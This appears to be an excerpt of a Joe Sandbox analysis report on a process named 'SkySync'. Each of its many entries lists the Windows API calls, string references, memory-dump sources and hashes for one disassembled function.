RegDeleteKeyW.ADVAPI32(?,?), ref: 00B116B5

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: f5d5ff9b007b858ace875078f6bf8c66d3ea5fa943309ffafeb9639e88d3a69d
Instruction ID: 36b5c998d9ba595fbbb3bcfa3ef755fa77f6c4a62894f4fb325dc157db5c24c8
Opcode Fuzzy Hash: f5d5ff9b007b858ace875078f6bf8c66d3ea5fa943309ffafeb9639e88d3a69d
Instruction Fuzzy Hash: BA314BB191010DBFEB149F94DC89EFFB7BCEF09301F4005A9E601A3241EA709E859BA4

Function 00B168F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B16911
GetWindowLongW.USER32(0103E3C8,000000F0), ref: 00B16944
GetWindowLongW.USER32(0103E3C8,000000F0), ref: 00B16979
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B169AB
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B169D5
GetWindowLongW.USER32(?,000000F0), ref: 00B169E6
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B16A00

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 2e898f33539c75b2940ecebdc2ea7e582b82824445e75ac2a7a9c1d6eba71d26
Instruction ID: 9ef0646466456bfe716a6574ac03bf08a7c03140bf013b7ab373bc082f279743
Opcode Fuzzy Hash: 2e898f33539c75b2940ecebdc2ea7e582b82824445e75ac2a7a9c1d6eba71d26
Instruction Fuzzy Hash: 20313530644254AFDB21CF19DC88FA837E5EB4A391F6801E4F5048F2B2CB71AC80CB40

Function 00AEE287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AEE2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AEE2F0
SysAllocString.OLEAUT32(00000000), ref: 00AEE2F3
SysAllocString.OLEAUT32(?), ref: 00AEE311
SysFreeString.OLEAUT32(?), ref: 00AEE31A
StringFromGUID2.OLE32(?,?,00000028), ref: 00AEE33F
SysAllocString.OLEAUT32(?), ref: 00AEE34D

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: d9c8c1e46e494143d630c775a1c0ab6b4336ce50e269bf73516788e6ca0cdbdf
Instruction ID: b96df595432d15b7bb9af3495713d1dcf1bd9ae4599247e24e96d1841b89d8ce
Opcode Fuzzy Hash: d9c8c1e46e494143d630c775a1c0ab6b4336ce50e269bf73516788e6ca0cdbdf
Instruction Fuzzy Hash: AA21957660421AAF9F20EFA9DC88CBB77BCEB08360B448125FA14DB251DA70AC458760

Function 00B0685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B08475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B084A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B068B1
WSAGetLastError.WSOCK32(00000000), ref: 00B068C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B068F9
connect.WSOCK32(00000000,?,00000010), ref: 00B06902
WSAGetLastError.WSOCK32 ref: 00B0690C
closesocket.WSOCK32(00000000), ref: 00B06935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B0694E

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: cdd5ffa841889d0e03469c9ee485536883f7ed31eb4ffeb53146510c393fd1cd
Instruction ID: 8a75c157e4f65bf268a31dede0aa62bf0c66e154057a2cf3224e0b501e0af773
Opcode Fuzzy Hash: cdd5ffa841889d0e03469c9ee485536883f7ed31eb4ffeb53146510c393fd1cd
Instruction Fuzzy Hash: A031D471600218AFDF10AF64CC85FBE7BE9EB48725F048069FD05AB2D1DB74AD158BA1

Function 00AEE360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AEE3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AEE3CB
SysAllocString.OLEAUT32(00000000), ref: 00AEE3CE
SysAllocString.OLEAUT32 ref: 00AEE3EF
SysFreeString.OLEAUT32 ref: 00AEE3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 00AEE412
SysAllocString.OLEAUT32(?), ref: 00AEE420

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: afbb553b250aed46cba58c2320794dc2d1f5d7957a7d08577ba5626c5ad5b78f
Instruction ID: f6dbc4aee40ca272f3c07705e01a397123ec5fa7c05d9868af2d0e3d3e8aefff
Opcode Fuzzy Hash: afbb553b250aed46cba58c2320794dc2d1f5d7957a7d08577ba5626c5ad5b78f
Instruction Fuzzy Hash: F2217435604245AFAB20EFADDC89CBF77ECEB0C360B008525F915CB2A1DA74EC418B64

Function 00B17BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A92111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A9214F
Part of subcall function 00A92111: GetStockObject.GDI32(00000011), ref: 00A92163
Part of subcall function 00A92111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A9216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B17C57
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B17C64
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B17C6F
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B17C7E
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B17C8A

Strings

Msctls_Progress32, xrefs: 00B17C28

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 6b62319ee12d799183cc42cca55cb1f37b96ed2ccb6858891324bd7630588137
Instruction ID: 90ff1eee9d0f837d3d49aa7eb6d6411d730125d33cd9db64bdda7ce1a9488726
Opcode Fuzzy Hash: 6b62319ee12d799183cc42cca55cb1f37b96ed2ccb6858891324bd7630588137
Instruction Fuzzy Hash: 7C1193B1150219BEEF159F60CC85EE77F6DEF08758F014114BA08A3050CA719C61DBA0

Function 00AF4C0C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00AF4C27
gethostname.WSOCK32(?,00000100), ref: 00AF4C41
gethostbyname.WSOCK32(?), ref: 00AF4C4E
inet_ntoa.WSOCK32(?), ref: 00AF4C94
WSACleanup.WSOCK32 ref: 00AF4CC7

Strings

0.0.0.0, xrefs: 00AF4C70

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 348263315-3771769585
Opcode ID: 1b47c1f1a9befa44fc54ed7a2b2add059bffcae445a28740267b71a4db866ce4
Instruction ID: aa800ce1a091f9dc88e933b746c600a1def24b80a23171691282759cdc17867f
Opcode Fuzzy Hash: 1b47c1f1a9befa44fc54ed7a2b2add059bffcae445a28740267b71a4db866ce4
Instruction Fuzzy Hash: EC11E431905118ABDB21BBB49D4AEFB77BCDF44710F0402A6F24997093EF7099838B60

Function 00AF9ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AE0817,?,?,00000000,00000000), ref: 00AF9EE8
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AE0817,?,?,00000000,00000000), ref: 00AF9EFF
LoadResource.KERNEL32(?,00000000,?,?,00AE0817,?,?,00000000,00000000,?,?,?,?,?,?,00AA4A14), ref: 00AF9F0F
SizeofResource.KERNEL32(?,00000000,?,?,00AE0817,?,?,00000000,00000000,?,?,?,?,?,?,00AA4A14), ref: 00AF9F20
LockResource.KERNEL32(00AE0817,?,?,00AE0817,?,?,00000000,00000000,?,?,?,?,?,?,00AA4A14,00000000), ref: 00AF9F2F

Strings

SCRIPT, xrefs: 00AF9EF5

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 1ed66a6f3c1b749e7cc2af18df58d67e13cd17165d2cab7d8593e28c89a9d107
Instruction ID: f1b2027e01c4672175719eba173a95665cdcba661d754de7737a280e16567dc3
Opcode Fuzzy Hash: 1ed66a6f3c1b749e7cc2af18df58d67e13cd17165d2cab7d8593e28c89a9d107
Instruction Fuzzy Hash: 4B115770200705AFE7209B65DC48F37BBB9EBC5B11F208269BA09D72A1DB71EC05CB61

Function 00AF47E8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00AF4802
LoadStringW.USER32(00000000), ref: 00AF4809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AF481F
LoadStringW.USER32(00000000), ref: 00AF4826
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AF486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00AF4847

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 7faa04bfd27144d79e21ce1ea77cbfc05e46237f28829b783a9be7b8750485f3
Instruction ID: 08910c35ac43ab3e709c03f5ff97ae48fb9f26f982da6c0cb976e298473181dd
Opcode Fuzzy Hash: 7faa04bfd27144d79e21ce1ea77cbfc05e46237f28829b783a9be7b8750485f3
Instruction Fuzzy Hash: 560162F29502087FE721ABA49D89EF7736CEB08301F400595B749E3042EA749E954B75

Function 00AB41B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AB4282,?), ref: 00AB41D3
GetProcAddress.KERNEL32(00000000), ref: 00AB41DA
EncodePointer.KERNEL32(00000000), ref: 00AB41E6
DecodePointer.KERNEL32(00000001,00AB4282,?), ref: 00AB4203

Strings

combase.dll, xrefs: 00AB41CE
RoInitialize, xrefs: 00AB41C2

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: c4783642d1193aca77538c30a8c15587daa59b7c145abe1293ca37a00a53d5c9
Instruction ID: 311021cceaa813c754f08893828d27d043628d0804deae1dcbae02babc99e4fc
Opcode Fuzzy Hash: c4783642d1193aca77538c30a8c15587daa59b7c145abe1293ca37a00a53d5c9
Instruction Fuzzy Hash: 29E012B09A0B11AFEB306B74EC5DB443995B718B07F504564B401E70B5CFB940458F04

Function 00AB428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AB41A8), ref: 00AB42A8
GetProcAddress.KERNEL32(00000000), ref: 00AB42AF
EncodePointer.KERNEL32(00000000), ref: 00AB42BA
DecodePointer.KERNEL32(00AB41A8), ref: 00AB42D5

Strings

combase.dll, xrefs: 00AB42A3
RoUninitialize, xrefs: 00AB4297

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 548fb8569826524208b8413de03d69de0dbe932669237557281b38f798fcd22d
Instruction ID: d43cd10e1f75d9deeca3acb12c2ae4cb7b755f6fd269dbb24badbcdc6e63744e
Opcode Fuzzy Hash: 548fb8569826524208b8413de03d69de0dbe932669237557281b38f798fcd22d
Instruction Fuzzy Hash: 0AE0B6705A0B00ABDB30AB60AD1DB843EA8BB0CB43F5005A5F001E70B6CFB85595DB14

Function 00A9218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00A921B8
GetWindowRect.USER32(?,?), ref: 00A921F9
ScreenToClient.USER32(?,?), ref: 00A92221
GetClientRect.USER32(?,?), ref: 00A92350
GetWindowRect.USER32(?,?), ref: 00A92369

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 275e1fb0eacce8244aee66390e6a25b85af13563453481f428584922dd064cad
Instruction ID: 8285d39b1c51d99ee263f876c50875f455dbf8ad0946e06af8d2dc826baf1231
Opcode Fuzzy Hash: 275e1fb0eacce8244aee66390e6a25b85af13563453481f428584922dd064cad
Instruction Fuzzy Hash: B2B16D39A10249EBDF10CFA8C5807EEB7F1FF08710F148129ED59AB255DB35A950DB64

Function 00B10844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B1040D,?,?), ref: 00B11491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B1091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B1095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B10980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B109A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B109EC
RegCloseKey.ADVAPI32(00000000), ref: 00B109F9

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: 1a3eb7c4800061c8f894ae3ca32e5c962bcac3331af0fb5854e425e0ce8f57f6
Instruction ID: 7e042a757e0277b4ffb70df693cda1b319f51bf1205c42011d32ffb1da64c6b0
Opcode Fuzzy Hash: 1a3eb7c4800061c8f894ae3ca32e5c962bcac3331af0fb5854e425e0ce8f57f6
Instruction Fuzzy Hash: BB519A31218204AFD710EF68C995EAFBBE8FF89314F40495DF485872A2DB71E985CB52

Function 00AC99D2 Relevance: 9.2, APIs: 6, Instructions: 160memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC1AF1: SetFilePointerEx.KERNEL32(00000000,00000002,?,00000000,?,00000000,00000000,00000000,00000000,?,00ABDC81,?,00000000,00000000,00000002,00000000), ref: 00AC1B28
Part of subcall function 00AC1AF1: GetLastError.KERNEL32(?,00ABDC81,?,00000000,00000000,00000002,00000000,00000000,00000000), ref: 00AC1B32

GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00B20994,00000001,00000000,?,?,00AC8479,00B20994,0000000C,00000080), ref: 00AC9A3B
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00B20994,00000001,00000000,?,?,00AC8479,00B20994,0000000C,00000080), ref: 00AC9A42
GetProcessHeap.KERNEL32(00000000,00B20994,?,?,?,?,?,?,?,?,00B20994,00000001,00000000,?,?,00AC8479), ref: 00AC9AE4
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B20994,00000001,00000000,?,?,00AC8479,00B20994), ref: 00AC9AEB
SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00B20994,00000001,00000000,?,?,00AC8479), ref: 00AC9B21
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00B20994,00000001,00000000,?,?,00AC8479,00B20994), ref: 00AC9B51

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Heap$ErrorFileLastProcess$AllocFreePointer
String ID:
API String ID: 1354853467-0
Opcode ID: 308a2bfb8cca3a0a76d57c4c76a23faa958a0f21b5e0def1438ed6b2dabcea73
Instruction ID: da4cddefb5d035c7a91d97ec18e36ac680f3b3e728404e9e1b00853238194acf
Opcode Fuzzy Hash: 308a2bfb8cca3a0a76d57c4c76a23faa958a0f21b5e0def1438ed6b2dabcea73
Instruction Fuzzy Hash: D741F831A00514ABDB146BBC8D4EFAF7BB8EF053A0F16461DF928E71E2DB7449428751

Function 00B15DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00B15E38
GetMenuItemCount.USER32(00000000), ref: 00B15E6F
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B15E97
GetMenuItemID.USER32(?,?), ref: 00B15F06
GetSubMenu.USER32(?,?), ref: 00B15F14
PostMessageW.USER32(?,00000111,?,00000000), ref: 00B15F65

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: ea9c2d02d90fa8fa486323b0b6b19fca860ddadd156a4e441bde0ec2686d2a51
Instruction ID: 4da4d34d0b96fbb4a0fa7d2afb57e259f4caa6041122bcaddb1def8f63a30c4e
Opcode Fuzzy Hash: ea9c2d02d90fa8fa486323b0b6b19fca860ddadd156a4e441bde0ec2686d2a51
Instruction Fuzzy Hash: 79515E35A01615EFCF21EFA4C945AEEB7F5EF48310F504099E915AB351CB30AE428B91

Function 00A91B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00A929E2: GetWindowLongW.USER32(?,000000EB), ref: 00A929F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 00A91B76
GetWindowRect.USER32(?,?), ref: 00A91BDA
ScreenToClient.USER32(?,?), ref: 00A91BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A91C08
EndPaint.USER32(?,?), ref: 00A91C52

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
